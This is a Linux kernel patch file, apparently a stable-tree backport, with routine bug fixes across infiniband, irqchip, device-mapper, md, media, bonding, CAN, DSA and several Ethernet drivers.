+diff --git a/drivers/infiniband/hw/irdma/type.h b/drivers/infiniband/hw/irdma/type.h
+index 517d41a1c2894..d6cb94dc744c5 100644
+--- a/drivers/infiniband/hw/irdma/type.h
++++ b/drivers/infiniband/hw/irdma/type.h
+@@ -410,6 +410,8 @@ struct irdma_sc_cqp {
+ 	struct irdma_dcqcn_cc_params dcqcn_params;
+ 	__le64 *host_ctx;
+ 	u64 *scratch_array;
++	u64 requested_ops;
++	atomic64_t completed_ops;
+ 	u32 cqp_id;
+ 	u32 sq_size;
+ 	u32 hw_sq_size;
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index dd428d915c175..280d633d4ec4f 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
+@@ -1161,7 +1161,7 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 	}
+ 	wqe_idx = (u32)FIELD_GET(IRDMA_CQ_WQEIDX, qword3);
+ 	info->qp_handle = (irdma_qp_handle)(unsigned long)qp;
+-	info->op_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
++	info->op_type = (u8)FIELD_GET(IRDMACQ_OP, qword3);
+ 
+ 	if (info->q_type == IRDMA_CQE_QTYPE_RQ) {
+ 		u32 array_idx;
+@@ -1527,6 +1527,9 @@ void irdma_uk_clean_cq(void *q, struct irdma_cq_uk *cq)
+ 		if (polarity != temp)
+ 			break;
+ 
++		/* Ensure CQE contents are read after valid bit is checked */
++		dma_rmb();
++
+ 		get_64bit_val(cqe, 8, &comp_ctx);
+ 		if ((void *)(unsigned long)comp_ctx == q)
+ 			set_64bit_val(cqe, 8, 0);
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 7887230c867b1..8c7617776e58b 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -481,7 +481,7 @@ void irdma_free_cqp_request(struct irdma_cqp *cqp,
+ 	if (cqp_request->dynamic) {
+ 		kfree(cqp_request);
+ 	} else {
+-		cqp_request->request_done = false;
++		WRITE_ONCE(cqp_request->request_done, false);
+ 		cqp_request->callback_fcn = NULL;
+ 		cqp_request->waiting = false;
+ 
+@@ -515,7 +515,7 @@ irdma_free_pending_cqp_request(struct irdma_cqp *cqp,
+ {
+ 	if (cqp_request->waiting) {
+ 		cqp_request->compl_info.error = true;
+-		cqp_request->request_done = true;
++		WRITE_ONCE(cqp_request->request_done, true);
+ 		wake_up(&cqp_request->waitq);
+ 	}
+ 	wait_event_timeout(cqp->remove_wq,
+@@ -567,11 +567,11 @@ static int irdma_wait_event(struct irdma_pci_f *rf,
+ 	bool cqp_error = false;
+ 	int err_code = 0;
+ 
+-	cqp_timeout.compl_cqp_cmds = rf->sc_dev.cqp_cmd_stats[IRDMA_OP_CMPL_CMDS];
++	cqp_timeout.compl_cqp_cmds = atomic64_read(&rf->sc_dev.cqp->completed_ops);
+ 	do {
+ 		irdma_cqp_ce_handler(rf, &rf->ccq.sc_cq);
+ 		if (wait_event_timeout(cqp_request->waitq,
+-				       cqp_request->request_done,
++				       READ_ONCE(cqp_request->request_done),
+ 				       msecs_to_jiffies(CQP_COMPL_WAIT_TIME_MS)))
+ 			break;
+ 
+diff --git a/drivers/infiniband/hw/mlx4/qp.c b/drivers/infiniband/hw/mlx4/qp.c
+index 488c906c0432c..ac479e81ddee8 100644
+--- a/drivers/infiniband/hw/mlx4/qp.c
++++ b/drivers/infiniband/hw/mlx4/qp.c
+@@ -530,15 +530,15 @@ static int set_qp_rss(struct mlx4_ib_dev *dev, struct mlx4_ib_rss *rss_ctx,
+ 		return (-EOPNOTSUPP);
+ 	}
+ 
+-	if (ucmd->rx_hash_fields_mask & ~(MLX4_IB_RX_HASH_SRC_IPV4	|
+-					  MLX4_IB_RX_HASH_DST_IPV4	|
+-					  MLX4_IB_RX_HASH_SRC_IPV6	|
+-					  MLX4_IB_RX_HASH_DST_IPV6	|
+-					  MLX4_IB_RX_HASH_SRC_PORT_TCP	|
+-					  MLX4_IB_RX_HASH_DST_PORT_TCP	|
+-					  MLX4_IB_RX_HASH_SRC_PORT_UDP	|
+-					  MLX4_IB_RX_HASH_DST_PORT_UDP  |
+-					  MLX4_IB_RX_HASH_INNER)) {
++	if (ucmd->rx_hash_fields_mask & ~(u64)(MLX4_IB_RX_HASH_SRC_IPV4	|
++					       MLX4_IB_RX_HASH_DST_IPV4	|
++					       MLX4_IB_RX_HASH_SRC_IPV6	|
++					       MLX4_IB_RX_HASH_DST_IPV6	|
++					       MLX4_IB_RX_HASH_SRC_PORT_TCP |
++					       MLX4_IB_RX_HASH_DST_PORT_TCP |
++					       MLX4_IB_RX_HASH_SRC_PORT_UDP |
++					       MLX4_IB_RX_HASH_DST_PORT_UDP |
++					       MLX4_IB_RX_HASH_INNER)) {
+ 		pr_debug("RX Hash fields_mask has unsupported mask (0x%llx)\n",
+ 			 ucmd->rx_hash_fields_mask);
+ 		return (-EOPNOTSUPP);
+diff --git a/drivers/infiniband/hw/mthca/mthca_qp.c b/drivers/infiniband/hw/mthca/mthca_qp.c
+index 69bba0ef4a5df..53f43649f7d08 100644
+--- a/drivers/infiniband/hw/mthca/mthca_qp.c
++++ b/drivers/infiniband/hw/mthca/mthca_qp.c
+@@ -1393,7 +1393,7 @@ int mthca_alloc_sqp(struct mthca_dev *dev,
+ 	if (mthca_array_get(&dev->qp_table.qp, mqpn))
+ 		err = -EBUSY;
+ 	else
+-		mthca_array_set(&dev->qp_table.qp, mqpn, qp->sqp);
++		mthca_array_set(&dev->qp_table.qp, mqpn, qp);
+ 	spin_unlock_irq(&dev->qp_table.lock);
+ 
+ 	if (err)
+diff --git a/drivers/irqchip/irq-bcm6345-l1.c b/drivers/irqchip/irq-bcm6345-l1.c
+index 6899e37810a88..b14c74f7b9b98 100644
+--- a/drivers/irqchip/irq-bcm6345-l1.c
++++ b/drivers/irqchip/irq-bcm6345-l1.c
+@@ -82,6 +82,7 @@ struct bcm6345_l1_chip {
+ };
+ 
+ struct bcm6345_l1_cpu {
++	struct bcm6345_l1_chip	*intc;
+ 	void __iomem		*map_base;
+ 	unsigned int		parent_irq;
+ 	u32			enable_cache[];
+@@ -115,17 +116,11 @@ static inline unsigned int cpu_for_irq(struct bcm6345_l1_chip *intc,
+ 
+ static void bcm6345_l1_irq_handle(struct irq_desc *desc)
+ {
+-	struct bcm6345_l1_chip *intc = irq_desc_get_handler_data(desc);
+-	struct bcm6345_l1_cpu *cpu;
++	struct bcm6345_l1_cpu *cpu = irq_desc_get_handler_data(desc);
++	struct bcm6345_l1_chip *intc = cpu->intc;
+ 	struct irq_chip *chip = irq_desc_get_chip(desc);
+ 	unsigned int idx;
+ 
+-#ifdef CONFIG_SMP
+-	cpu = intc->cpus[cpu_logical_map(smp_processor_id())];
+-#else
+-	cpu = intc->cpus[0];
+-#endif
+-
+ 	chained_irq_enter(chip, desc);
+ 
+ 	for (idx = 0; idx < intc->n_words; idx++) {
+@@ -253,6 +248,7 @@ static int __init bcm6345_l1_init_one(struct device_node *dn,
+ 	if (!cpu)
+ 		return -ENOMEM;
+ 
++	cpu->intc = intc;
+ 	cpu->map_base = ioremap(res.start, sz);
+ 	if (!cpu->map_base)
+ 		return -ENOMEM;
+@@ -268,7 +264,7 @@ static int __init bcm6345_l1_init_one(struct device_node *dn,
+ 		return -EINVAL;
+ 	}
+ 	irq_set_chained_handler_and_data(cpu->parent_irq,
+-						bcm6345_l1_irq_handle, intc);
++						bcm6345_l1_irq_handle, cpu);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 973ede0197e36..8956881503d9a 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -271,13 +271,23 @@ static void vpe_to_cpuid_unlock(struct its_vpe *vpe, unsigned long flags)
+ 	raw_spin_unlock_irqrestore(&vpe->vpe_lock, flags);
+ }
+ 
++static struct irq_chip its_vpe_irq_chip;
++
+ static int irq_to_cpuid_lock(struct irq_data *d, unsigned long *flags)
+ {
+-	struct its_vlpi_map *map = get_vlpi_map(d);
++	struct its_vpe *vpe = NULL;
+ 	int cpu;
+ 
+-	if (map) {
+-		cpu = vpe_to_cpuid_lock(map->vpe, flags);
++	if (d->chip == &its_vpe_irq_chip) {
++		vpe = irq_data_get_irq_chip_data(d);
++	} else {
++		struct its_vlpi_map *map = get_vlpi_map(d);
++		if (map)
++			vpe = map->vpe;
++	}
++
++	if (vpe) {
++		cpu = vpe_to_cpuid_lock(vpe, flags);
+ 	} else {
+ 		/* Physical LPIs are already locked via the irq_desc lock */
+ 		struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+@@ -291,10 +301,18 @@ static int irq_to_cpuid_lock(struct irq_data *d, unsigned long *flags)
+ 
+ static void irq_to_cpuid_unlock(struct irq_data *d, unsigned long flags)
+ {
+-	struct its_vlpi_map *map = get_vlpi_map(d);
++	struct its_vpe *vpe = NULL;
++
++	if (d->chip == &its_vpe_irq_chip) {
++		vpe = irq_data_get_irq_chip_data(d);
++	} else {
++		struct its_vlpi_map *map = get_vlpi_map(d);
++		if (map)
++			vpe = map->vpe;
++	}
+ 
+-	if (map)
+-		vpe_to_cpuid_unlock(map->vpe, flags);
++	if (vpe)
++		vpe_to_cpuid_unlock(vpe, flags);
+ }
+ 
+ static struct its_collection *valid_col(struct its_collection *col)
+@@ -1431,14 +1449,29 @@ static void wait_for_syncr(void __iomem *rdbase)
+ 		cpu_relax();
+ }
+ 
+-static void direct_lpi_inv(struct irq_data *d)
++static void __direct_lpi_inv(struct irq_data *d, u64 val)
+ {
+-	struct its_vlpi_map *map = get_vlpi_map(d);
+ 	void __iomem *rdbase;
+ 	unsigned long flags;
+-	u64 val;
+ 	int cpu;
+ 
++	/* Target the redistributor this LPI is currently routed to */
++	cpu = irq_to_cpuid_lock(d, &flags);
++	raw_spin_lock(&gic_data_rdist_cpu(cpu)->rd_lock);
++
++	rdbase = per_cpu_ptr(gic_rdists->rdist, cpu)->rd_base;
++	gic_write_lpir(val, rdbase + GICR_INVLPIR);
++	wait_for_syncr(rdbase);
++
++	raw_spin_unlock(&gic_data_rdist_cpu(cpu)->rd_lock);
++	irq_to_cpuid_unlock(d, flags);
++}
++
++static void direct_lpi_inv(struct irq_data *d)
++{
++	struct its_vlpi_map *map = get_vlpi_map(d);
++	u64 val;
++
+ 	if (map) {
+ 		struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 
+@@ -1451,15 +1484,7 @@ static void direct_lpi_inv(struct irq_data *d)
+ 		val = d->hwirq;
+ 	}
+ 
+-	/* Target the redistributor this LPI is currently routed to */
+-	cpu = irq_to_cpuid_lock(d, &flags);
+-	raw_spin_lock(&gic_data_rdist_cpu(cpu)->rd_lock);
+-	rdbase = per_cpu_ptr(gic_rdists->rdist, cpu)->rd_base;
+-	gic_write_lpir(val, rdbase + GICR_INVLPIR);
+-
+-	wait_for_syncr(rdbase);
+-	raw_spin_unlock(&gic_data_rdist_cpu(cpu)->rd_lock);
+-	irq_to_cpuid_unlock(d, flags);
++	__direct_lpi_inv(d, val);
+ }
+ 
+ static void lpi_update_config(struct irq_data *d, u8 clr, u8 set)
+@@ -3941,18 +3966,10 @@ static void its_vpe_send_inv(struct irq_data *d)
+ {
+ 	struct its_vpe *vpe = irq_data_get_irq_chip_data(d);
+ 
+-	if (gic_rdists->has_direct_lpi) {
+-		void __iomem *rdbase;
+-
+-		/* Target the redistributor this VPE is currently known on */
+-		raw_spin_lock(&gic_data_rdist_cpu(vpe->col_idx)->rd_lock);
+-		rdbase = per_cpu_ptr(gic_rdists->rdist, vpe->col_idx)->rd_base;
+-		gic_write_lpir(d->parent_data->hwirq, rdbase + GICR_INVLPIR);
+-		wait_for_syncr(rdbase);
+-		raw_spin_unlock(&gic_data_rdist_cpu(vpe->col_idx)->rd_lock);
+-	} else {
++	if (gic_rdists->has_direct_lpi)
++		__direct_lpi_inv(d, d->parent_data->hwirq);
++	else
+ 		its_vpe_send_cmd(vpe, its_send_inv);
+-	}
+ }
+ 
+ static void its_vpe_mask_irq(struct irq_data *d)
+diff --git a/drivers/md/dm-cache-policy-smq.c b/drivers/md/dm-cache-policy-smq.c
+index 54343812223e8..c983cf240632e 100644
+--- a/drivers/md/dm-cache-policy-smq.c
++++ b/drivers/md/dm-cache-policy-smq.c
+@@ -855,7 +855,13 @@ struct smq_policy {
+ 
+ 	struct background_tracker *bg_work;
+ 
+-	bool migrations_allowed;
++	bool migrations_allowed:1;
++
++	/*
++	 * If this is set the policy will try and clean the whole cache
++	 * even if the device is not idle.
++	 */
++	bool cleaner:1;
+ };
+ 
+ /*----------------------------------------------------------------*/
+@@ -1136,7 +1142,7 @@ static bool clean_target_met(struct smq_policy *mq, bool idle)
+ 	 * Cache entries may not be populated.  So we cannot rely on the
+ 	 * size of the clean queue.
+ 	 */
+-	if (idle) {
++	if (idle || mq->cleaner) {
+ 		/*
+ 		 * We'd like to clean everything.
+ 		 */
+@@ -1719,11 +1725,9 @@ static void calc_hotspot_params(sector_t origin_size,
+ 		*hotspot_block_size /= 2u;
+ }
+ 
+-static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+-					    sector_t origin_size,
+-					    sector_t cache_block_size,
+-					    bool mimic_mq,
+-					    bool migrations_allowed)
++static struct dm_cache_policy *
++__smq_create(dm_cblock_t cache_size, sector_t origin_size, sector_t cache_block_size,
++	     bool mimic_mq, bool migrations_allowed, bool cleaner)
+ {
+ 	unsigned int i;
+ 	unsigned int nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
+@@ -1810,6 +1814,7 @@ static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+ 		goto bad_btracker;
+ 
+ 	mq->migrations_allowed = migrations_allowed;
++	mq->cleaner = cleaner;
+ 
+ 	return &mq->policy;
+ 
+@@ -1833,21 +1838,24 @@ static struct dm_cache_policy *smq_create(dm_cblock_t cache_size,
+ 					  sector_t origin_size,
+ 					  sector_t cache_block_size)
+ {
+-	return __smq_create(cache_size, origin_size, cache_block_size, false, true);
++	return __smq_create(cache_size, origin_size, cache_block_size,
++			    false, true, false);
+ }
+ 
+ static struct dm_cache_policy *mq_create(dm_cblock_t cache_size,
+ 					 sector_t origin_size,
+ 					 sector_t cache_block_size)
+ {
+-	return __smq_create(cache_size, origin_size, cache_block_size, true, true);
++	return __smq_create(cache_size, origin_size, cache_block_size,
++			    true, true, false);
+ }
+ 
+ static struct dm_cache_policy *cleaner_create(dm_cblock_t cache_size,
+ 					      sector_t origin_size,
+ 					      sector_t cache_block_size)
+ {
+-	return __smq_create(cache_size, origin_size, cache_block_size, false, false);
++	return __smq_create(cache_size, origin_size, cache_block_size,
++			    false, false, true);
+ }
+ 
+ /*----------------------------------------------------------------*/
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index b26c12856b1db..4b7528dc2fd08 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -3254,8 +3254,7 @@ size_check:
+ 	r = md_start(&rs->md);
+ 	if (r) {
+ 		ti->error = "Failed to start raid array";
+-		mddev_unlock(&rs->md);
+-		goto bad_md_start;
++		goto bad_unlock;
+ 	}
+ 
+ 	/* If raid4/5/6 journal mode explicitly requested (only possible with journal dev) -> set it */
+@@ -3263,8 +3262,7 @@ size_check:
+ 		r = r5c_journal_mode_set(&rs->md, rs->journal_dev.mode);
+ 		if (r) {
+ 			ti->error = "Failed to set raid4/5/6 journal mode";
+-			mddev_unlock(&rs->md);
+-			goto bad_journal_mode_set;
++			goto bad_unlock;
+ 		}
+ 	}
+ 
+@@ -3275,14 +3273,14 @@ size_check:
+ 	if (rs_is_raid456(rs)) {
+ 		r = rs_set_raid456_stripe_cache(rs);
+ 		if (r)
+-			goto bad_stripe_cache;
++			goto bad_unlock;
+ 	}
+ 
+ 	/* Now do an early reshape check */
+ 	if (test_bit(RT_FLAG_RESHAPE_RS, &rs->runtime_flags)) {
+ 		r = rs_check_reshape(rs);
+ 		if (r)
+-			goto bad_check_reshape;
++			goto bad_unlock;
+ 
+ 		/* Restore new, ctr requested layout to perform check */
+ 		rs_config_restore(rs, &rs_layout);
+@@ -3291,7 +3289,7 @@ size_check:
+ 			r = rs->md.pers->check_reshape(&rs->md);
+ 			if (r) {
+ 				ti->error = "Reshape check failed";
+-				goto bad_check_reshape;
++				goto bad_unlock;
+ 			}
+ 		}
+ 	}
+@@ -3302,11 +3300,9 @@ size_check:
+ 	mddev_unlock(&rs->md);
+ 	return 0;
+ 
+-bad_md_start:
+-bad_journal_mode_set:
+-bad_stripe_cache:
+-bad_check_reshape:
++bad_unlock:
+ 	md_stop(&rs->md);
++	mddev_unlock(&rs->md);
+ bad:
+ 	raid_set_free(rs);
+ 
+@@ -3317,7 +3313,9 @@ static void raid_dtr(struct dm_target *ti)
+ {
+ 	struct raid_set *rs = ti->private;
+ 
++	mddev_lock_nointr(&rs->md);
+ 	md_stop(&rs->md);
++	mddev_unlock(&rs->md);
+ 	raid_set_free(rs);
+ }
+ 
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 829e1bd9bcbf9..45daba0eb9310 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -6269,6 +6269,8 @@ static void __md_stop(struct mddev *mddev)
+ 
+ void md_stop(struct mddev *mddev)
+ {
++	lockdep_assert_held(&mddev->reconfig_mutex);
++
+ 	/* stop the array and free an attached data structures.
+ 	 * This is called from dm-raid
+ 	 */
+diff --git a/drivers/media/platform/amphion/vpu_core.c b/drivers/media/platform/amphion/vpu_core.c
+index f9ec1753f7c86..be80410682681 100644
+--- a/drivers/media/platform/amphion/vpu_core.c
++++ b/drivers/media/platform/amphion/vpu_core.c
+@@ -828,7 +828,7 @@ static const struct dev_pm_ops vpu_core_pm_ops = {
+ 
+ static struct vpu_core_resources imx8q_enc = {
+ 	.type = VPU_CORE_TYPE_ENC,
+-	.fwname = "vpu/vpu_fw_imx8_enc.bin",
++	.fwname = "amphion/vpu/vpu_fw_imx8_enc.bin",
+ 	.stride = 16,
+ 	.max_width = 1920,
+ 	.max_height = 1920,
+@@ -843,7 +843,7 @@ static struct vpu_core_resources imx8q_enc = {
+ 
+ static struct vpu_core_resources imx8q_dec = {
+ 	.type = VPU_CORE_TYPE_DEC,
+-	.fwname = "vpu/vpu_fw_imx8_dec.bin",
++	.fwname = "amphion/vpu/vpu_fw_imx8_dec.bin",
+ 	.stride = 256,
+ 	.max_width = 8188,
+ 	.max_height = 8188,
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 91d84df91123b..576370f89c755 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1512,6 +1512,11 @@ static void bond_setup_by_slave(struct net_device *bond_dev,
+ 
+ 	memcpy(bond_dev->broadcast, slave_dev->broadcast,
+ 		slave_dev->addr_len);
++
++	if (slave_dev->flags & IFF_POINTOPOINT) {
++		bond_dev->flags &= ~(IFF_BROADCAST | IFF_MULTICAST);
++		bond_dev->flags |= (IFF_POINTOPOINT | IFF_NOARP);
++	}
+ }
+ 
+ /* On bonding slaves other than the currently active slave, suppress
+diff --git a/drivers/net/can/usb/gs_usb.c b/drivers/net/can/usb/gs_usb.c
+index fe532d5048897..5858cbafbc965 100644
+--- a/drivers/net/can/usb/gs_usb.c
++++ b/drivers/net/can/usb/gs_usb.c
+@@ -989,6 +989,8 @@ static int gs_can_close(struct net_device *netdev)
+ 	usb_kill_anchored_urbs(&dev->tx_submitted);
+ 	atomic_set(&dev->active_tx_urbs, 0);
+ 
++	dev->can.state = CAN_STATE_STOPPED;
++
+ 	/* reset the device */
+ 	rc = gs_cmd_reset(dev);
+ 	if (rc < 0)
+diff --git a/drivers/net/dsa/qca/qca8k-common.c b/drivers/net/dsa/qca/qca8k-common.c
+index fb45b598847be..7c3dd71a81bd8 100644
+--- a/drivers/net/dsa/qca/qca8k-common.c
++++ b/drivers/net/dsa/qca/qca8k-common.c
+@@ -281,7 +281,7 @@ void qca8k_fdb_flush(struct qca8k_priv *priv)
+ }
+ 
+ static int qca8k_fdb_search_and_insert(struct qca8k_priv *priv, u8 port_mask,
+-				       const u8 *mac, u16 vid)
++				       const u8 *mac, u16 vid, u8 aging)
+ {
+ 	struct qca8k_fdb fdb = { 0 };
+ 	int ret;
+@@ -298,10 +298,12 @@ static int qca8k_fdb_search_and_insert(struct qca8k_priv *priv, u8 port_mask,
+ 		goto exit;
+ 
+ 	/* Rule exist. Delete first */
+-	if (!fdb.aging) {
++	if (fdb.aging) {
+ 		ret = qca8k_fdb_access(priv, QCA8K_FDB_PURGE, -1);
+ 		if (ret)
+ 			goto exit;
++	} else {
++		fdb.aging = aging;
+ 	}
+ 
+ 	/* Add port to fdb portmask */
+@@ -328,6 +330,10 @@ static int qca8k_fdb_search_and_del(struct qca8k_priv *priv, u8 port_mask,
+ 	if (ret < 0)
+ 		goto exit;
+ 
++	ret = qca8k_fdb_read(priv, &fdb);
++	if (ret < 0)
++		goto exit;
++
+ 	/* Rule doesn't exist. Why delete? */
+ 	if (!fdb.aging) {
+ 		ret = -EINVAL;
+@@ -847,7 +853,11 @@ int qca8k_port_mdb_add(struct dsa_switch *ds, int port,
+ 	const u8 *addr = mdb->addr;
+ 	u16 vid = mdb->vid;
+ 
+-	return qca8k_fdb_search_and_insert(priv, BIT(port), addr, vid);
++	if (!vid)
++		vid = QCA8K_PORT_VID_DEF;
++
++	return qca8k_fdb_search_and_insert(priv, BIT(port), addr, vid,
++					   QCA8K_ATU_STATUS_STATIC);
+ }
+ 
+ int qca8k_port_mdb_del(struct dsa_switch *ds, int port,
+@@ -858,6 +868,9 @@ int qca8k_port_mdb_del(struct dsa_switch *ds, int port,
+ 	const u8 *addr = mdb->addr;
+ 	u16 vid = mdb->vid;
+ 
++	if (!vid)
++		vid = QCA8K_PORT_VID_DEF;
++
+ 	return qca8k_fdb_search_and_del(priv, BIT(port), addr, vid);
+ }
+ 
+diff --git a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+index 5db0f3495a32e..5935be190b9e2 100644
+--- a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
++++ b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+@@ -1641,8 +1641,11 @@ static int atl1e_tso_csum(struct atl1e_adapter *adapter,
+ 			real_len = (((unsigned char *)ip_hdr(skb) - skb->data)
+ 					+ ntohs(ip_hdr(skb)->tot_len));
+ 
+-			if (real_len < skb->len)
+-				pskb_trim(skb, real_len);
++			if (real_len < skb->len) {
++				err = pskb_trim(skb, real_len);
++				if (err)
++					return err;
++			}
+ 
+ 			hdr_len = skb_tcp_all_headers(skb);
+ 			if (unlikely(skb->len == hdr_len)) {
+diff --git a/drivers/net/ethernet/atheros/atlx/atl1.c b/drivers/net/ethernet/atheros/atlx/atl1.c
+index c8444bcdf5270..02aa6fd8ebc2d 100644
+--- a/drivers/net/ethernet/atheros/atlx/atl1.c
++++ b/drivers/net/ethernet/atheros/atlx/atl1.c
+@@ -2113,8 +2113,11 @@ static int atl1_tso(struct atl1_adapter *adapter, struct sk_buff *skb,
+ 
+ 			real_len = (((unsigned char *)iph - skb->data) +
+ 				ntohs(iph->tot_len));
+-			if (real_len < skb->len)
+-				pskb_trim(skb, real_len);
++			if (real_len < skb->len) {
++				err = pskb_trim(skb, real_len);
++				if (err)
++					return err;
++			}
+ 			hdr_len = skb_tcp_all_headers(skb);
+ 			if (skb->len == hdr_len) {
+ 				iph->check = 0;
+diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c
+index 5d39df8452653..b12152e2fca0a 100644
+--- a/drivers/net/ethernet/emulex/benet/be_main.c
++++ b/drivers/net/ethernet/emulex/benet/be_main.c
+@@ -1139,7 +1139,8 @@ static struct sk_buff *be_lancer_xmit_workarounds(struct be_adapter *adapter,
+ 	    (lancer_chip(adapter) || BE3_chip(adapter) ||
+ 	     skb_vlan_tag_present(skb)) && is_ipv4_pkt(skb)) {
+ 		ip = (struct iphdr *)ip_hdr(skb);
+-		pskb_trim(skb, eth_hdr_len + ntohs(ip->tot_len));
++		if (unlikely(pskb_trim(skb, eth_hdr_len + ntohs(ip->tot_len))))
++			goto tx_drop;
+ 	}
+ 
+ 	/* If vlan tag is already inlined in the packet, skip HW VLAN
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hnae3.h b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+index 17137de9338cf..fcb8b6dc5ab92 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hnae3.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+@@ -31,6 +31,7 @@
+ #include <linux/pci.h>
+ #include <linux/pkt_sched.h>
+ #include <linux/types.h>
++#include <linux/bitmap.h>
+ #include <net/pkt_cls.h>
+ 
+ #define HNAE3_MOD_VERSION "1.0"
+@@ -402,7 +403,7 @@ struct hnae3_ae_dev {
+ 	unsigned long hw_err_reset_req;
+ 	struct hnae3_dev_specs dev_specs;
+ 	u32 dev_version;
+-	unsigned long caps[BITS_TO_LONGS(HNAE3_DEV_CAPS_MAX_NUM)];
++	DECLARE_BITMAP(caps, HNAE3_DEV_CAPS_MAX_NUM);
+ 	void *priv;
+ };
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+index c797d54f98caa..2ccb0f5460797 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+@@ -170,6 +170,20 @@ static const struct hclge_comm_caps_bit_map hclge_vf_cmd_caps[] = {
+ 	{HCLGE_COMM_CAP_GRO_B, HNAE3_DEV_SUPPORT_GRO_B},
+ };
+ 
++static void
++hclge_comm_capability_to_bitmap(unsigned long *bitmap, __le32 *caps)
++{
++	const unsigned int words = HCLGE_COMM_QUERY_CAP_LENGTH;
++	u32 val[HCLGE_COMM_QUERY_CAP_LENGTH];
++	unsigned int i;
++
++	for (i = 0; i < words; i++)
++		val[i] = __le32_to_cpu(caps[i]);
++
++	bitmap_from_arr32(bitmap, val,
++			  HCLGE_COMM_QUERY_CAP_LENGTH * BITS_PER_TYPE(u32));
++}
++
+ static void
+ hclge_comm_parse_capability(struct hnae3_ae_dev *ae_dev, bool is_pf,
+ 			    struct hclge_comm_query_version_cmd *cmd)
+@@ -178,11 +192,12 @@ hclge_comm_parse_capability(struct hnae3_ae_dev *ae_dev, bool is_pf,
+ 				is_pf ? hclge_pf_cmd_caps : hclge_vf_cmd_caps;
+ 	u32 size = is_pf ? ARRAY_SIZE(hclge_pf_cmd_caps) :
+ 				ARRAY_SIZE(hclge_vf_cmd_caps);
+-	u32 caps, i;
++	DECLARE_BITMAP(caps, HCLGE_COMM_QUERY_CAP_LENGTH * BITS_PER_TYPE(u32));
++	u32 i;
+ 
+-	caps = __le32_to_cpu(cmd->caps[0]);
++	hclge_comm_capability_to_bitmap(caps, cmd->caps);
+ 	for (i = 0; i < size; i++)
+-		if (hnae3_get_bit(caps, caps_map[i].imp_bit))
++		if (test_bit(caps_map[i].imp_bit, caps))
+ 			set_bit(caps_map[i].local_bit, ae_dev->caps);
+ }
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+index c4aded65e848b..09362823140d5 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+@@ -52,7 +52,10 @@ static void hclge_tm_info_to_ieee_ets(struct hclge_dev *hdev,
+ 
+ 	for (i = 0; i < HNAE3_MAX_TC; i++) {
+ 		ets->prio_tc[i] = hdev->tm_info.prio_tc[i];
+-		ets->tc_tx_bw[i] = hdev->tm_info.pg_info[0].tc_dwrr[i];
++		if (i < hdev->tm_info.num_tc)
++			ets->tc_tx_bw[i] = hdev->tm_info.pg_info[0].tc_dwrr[i];
++		else
++			ets->tc_tx_bw[i] = 0;
+ 
+ 		if (hdev->tm_info.tc_info[i].tc_sch_mode ==
+ 		    HCLGE_SCH_MODE_SP)
+@@ -123,7 +126,8 @@ static u8 hclge_ets_tc_changed(struct hclge_dev *hdev, struct ieee_ets *ets,
+ }
+ 
+ static int hclge_ets_sch_mode_validate(struct hclge_dev *hdev,
+-				       struct ieee_ets *ets, bool *changed)
++				       struct ieee_ets *ets, bool *changed,
++				       u8 tc_num)
+ {
+ 	bool has_ets_tc = false;
+ 	u32 total_ets_bw = 0;
+@@ -137,6 +141,13 @@ static int hclge_ets_sch_mode_validate(struct hclge_dev *hdev,
+ 				*changed = true;
+ 			break;
+ 		case IEEE_8021QAZ_TSA_ETS:
++			if (i >= tc_num) {
++				dev_err(&hdev->pdev->dev,
++					"tc%u is disabled, cannot set ets bw\n",
++					i);
++				return -EINVAL;
++			}
++
+ 			/* The hardware will switch to sp mode if bandwidth is
+ 			 * 0, so limit ets bandwidth must be greater than 0.
+ 			 */
+@@ -176,7 +187,7 @@ static int hclge_ets_validate(struct hclge_dev *hdev, struct ieee_ets *ets,
+ 	if (ret)
+ 		return ret;
+ 
